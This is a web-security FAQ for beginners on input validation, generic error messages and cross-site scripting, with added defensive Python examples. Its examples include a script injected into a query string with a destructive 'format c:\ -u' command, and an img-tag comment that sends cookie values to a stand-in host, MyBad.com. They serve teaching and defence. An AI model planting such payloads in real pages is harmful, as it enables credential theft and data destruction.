Question:
What is security?
Answer:
Security ensures your website remains healthy and is not
compromised by viruses and other malicious code, on both the web server
and the client browser.
Question:
How do I provide security?
Answer:
Always perform validation that input is what it should be,
and is not what it should not be.
Question:
What if my website offers no user input?
Answer:
Then you are safe, but keep in mind that query strings and AJAX
open the door to user input.
Question:
How do query strings open that door?
Answer:
Any time your website inspects a query string that is part of the URI,
a visitor to your site may tamper with that query string. For example,
consider the URI below:
http://mysite.com/mypictures.php?style=casual
// a visitor could modify the URI:
http://mysite.com/mypictures.php?<script>doSomethingBad...</script>
// where doSomethingBad... may lead to executing a command such as:
// format c:\ -u
Question:
How does AJAX open the door?
Answer:
AJAX provides a client-side means of delivering custom requests to the server.
Consider the client-side pseudo code below:
get mypictures.xml
// a visitor could modify that command:
get <script>doSomethingBad...</script>
Question:
Does client-side validation provide security?
Answer:
Definitely not!
Client-side validation simply notifies a visitor that some input
needs correcting, without making a round trip to the web server
and back, which offers better performance.
As we have seen above, client-side data (including the validation
itself) can be manipulated and/or bypassed.
Question:
What server-side validation should I perform?
Answer:
ALL input must be validated on the server!
Server-side validation includes, but is not limited to...
- validate the size of input:
is password length too short or too long?
- validate data content:
is numeric input indeed numeric?
- validate message format:
does query string contain exactly
2 field/value pairs?
- validate field names:
is "FirstName" indeed "FirstName"?
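The four checks above, applied to the tampered mypictures query string from the earlier answer, as an added example that is not part of this FAQ. It assumes a hypothetical mypictures page that expects exactly two fields, style and page; the length limit, allowed styles and page range are constructed for the example.

```python
import re
from urllib.parse import parse_qsl

# Constructed rules for a hypothetical mypictures page (not from the FAQ).
MAX_QUERY_LENGTH = 256                      # size check
EXPECTED_FIELDS = {"style", "page"}         # field-name check
ALLOWED_STYLES = {"casual", "formal", "holiday"}
PAGE_PATTERN = re.compile(r"[0-9]{1,3}")    # ASCII digits only, at most 3


def validate_picture_query(query: str) -> dict:
    """Validate the raw query string and return clean, typed values.

    Raises ValueError with a reason meant for the server log; the visitor
    should only ever see a generic error.
    """
    # 1. Size: refuse oversized input before doing any work on it.
    if len(query) > MAX_QUERY_LENGTH:
        raise ValueError("query string too long")

    # 2. Message format: strict parsing rejects anything that is not
    #    field=value (e.g. a bare <script> tag), then require exactly 2 pairs.
    pairs = parse_qsl(query, keep_blank_values=True, strict_parsing=True)
    if len(pairs) != 2:
        raise ValueError(f"expected 2 field/value pairs, got {len(pairs)}")

    # 3. Field names: exactly the expected set, so duplicates or extras fail.
    fields = dict(pairs)
    if set(fields) != EXPECTED_FIELDS:
        raise ValueError(f"unexpected field names: {sorted(fields)}")

    # 4. Data content: allowlist for the style, numeric range for the page.
    style = fields["style"]
    if style not in ALLOWED_STYLES:
        raise ValueError("style not in allowlist")
    page = fields["page"]
    if not PAGE_PATTERN.fullmatch(page) or not 1 <= int(page) <= 999:
        raise ValueError("page is not a number between 1 and 999")

    return {"style": style, "page": int(page)}


def is_valid_query(query: str) -> bool:
    """Boolean wrapper: True only if every check passes."""
    try:
        validate_picture_query(query)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for q in ("style=casual&page=3",
              "<script>doSomethingBad...</script>",
              "style=<script>x</script>&page=1",
              "style=casual&style=formal",
              "style=casual&page=1&debug=1"):
        print(f"{q!r:45} -> {is_valid_query(q)}")
```

Only the first query passes; the tampered script, a style outside the allowlist, a duplicated field name and an extra field are each rejected by a different one of the four checks.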
Question:
What error messages should the server return?
Answer:
Error messages should be generic and not specific. For example:
Invalid Signon.
instead of
The name is correct, but the password is too short.
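A sign-on check that returns the same generic message for every failure while logging the specific reason on the server, added here as an example and not taken from the FAQ. The user table, salt and password length limits are constructed for the example.

```python
import hashlib
import hmac
import logging

log = logging.getLogger("signon")
GENERIC_MESSAGE = "Invalid Signon."        # the only text a visitor ever sees
MIN_PASSWORD, MAX_PASSWORD = 8, 128


def _hash_password(salt: bytes, password: str) -> bytes:
    # PBKDF2 keeps the example realistic; the point is the message, not the hash.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed user table for the example: name -> (salt, password hash).
_SALT = b"example-salt-not-for-production"
USERS = {"alice": (_SALT, _hash_password(_SALT, "correct horse battery"))}


def signon(name: str, password: str) -> tuple:
    """Return (success, message).

    Every failure yields the identical message, so the response cannot tell
    a visitor whether the name, the length or the password was the problem.
    The specific reason is written to the server log only.
    """
    if not MIN_PASSWORD <= len(password) <= MAX_PASSWORD:
        log.warning("signon failed for %r: bad password length", name)
        return False, GENERIC_MESSAGE
    record = USERS.get(name)
    if record is None:
        # Hash anyway so an unknown name takes as long as a wrong password.
        _hash_password(_SALT, password)
        log.warning("signon failed: unknown user %r", name)
        return False, GENERIC_MESSAGE
    salt, stored = record
    if not hmac.compare_digest(stored, _hash_password(salt, password)):
        log.warning("signon failed for %r: wrong password", name)
        return False, GENERIC_MESSAGE
    return True, "Welcome, %s." % name


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    for name, pw in (("alice", "correct horse battery"),
                     ("alice", "short"),
                     ("alice", "wrong password here"),
                     ("mallory", "correct horse battery")):
        print(name, "->", signon(name, pw))
```

The log lines carry the detail an administrator needs; the three failing attempts all produce the same "Invalid Signon." for the visitor.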
Question:
OK, I understand how bad input sent to the server might
do bad things on the server, but how can
it do bad things in my browser?
Answer:
Suppose your website is a Wiki about goldfish, and
people visit your site to learn and post comments about goldfish.
Suppose someone posts the following comment:
<img src="http://MyBad.com/MyBad.php?id=document.cookie.id&pw=document.cookie.pw" />
All visitors to your site download that "comment" into their browser,
and the browser dutifully sends their ID and password to some hacker in Florida!
Of course, you already know better than to store sensitive data in a cookie, right?
Note: document.cookie.id is pseudo code to demonstrate the concept.
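Two server-side defences for the goldfish Wiki scenario, added here as an example that is not part of the FAQ: encoding the posted comment for its HTML context on output, so the browser shows the img tag as text instead of fetching it, and marking the session cookie HttpOnly and Secure so scripts cannot read it through document.cookie. The comment string is the one from the answer above, reused as constructed test input; the cookie name and value are constructed.

```python
import html
from http.cookies import SimpleCookie

# The comment from the goldfish Wiki example, reused as constructed input.
EVIL_COMMENT = ('<img src="http://MyBad.com/MyBad.php'
                '?id=document.cookie.id&pw=document.cookie.pw" />')


def render_comment_unsafe(comment: str) -> str:
    """What a naive Wiki does: drop the posted text straight into the page.
    The browser then parses the <img> tag and requests the foreign URL."""
    return f'<p class="comment">{comment}</p>'


def render_comment(comment: str) -> str:
    """Encode for the HTML context on output: <, >, &, " and ' become
    entities, so the visitor sees the tag as text and nothing is fetched."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie line for an opaque session id (never a password).
    HttpOnly keeps it out of document.cookie; Secure keeps it off plain HTTP."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


if __name__ == "__main__":
    print("unsafe:", render_comment_unsafe(EVIL_COMMENT))
    print("safe:  ", render_comment(EVIL_COMMENT))
    print(session_cookie_header("constructed-session-id"))
```

Escaping on output is the right place for this defence: the comment is stored as the visitor typed it, but no copy of it ever reaches another browser as live markup.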
Further reading:
AJAX Security
by Billy Hoffman & Bryan Sullivan
Addison-Wesley Professional
Copyright: December 2007
ISBN: 0-321-49193-9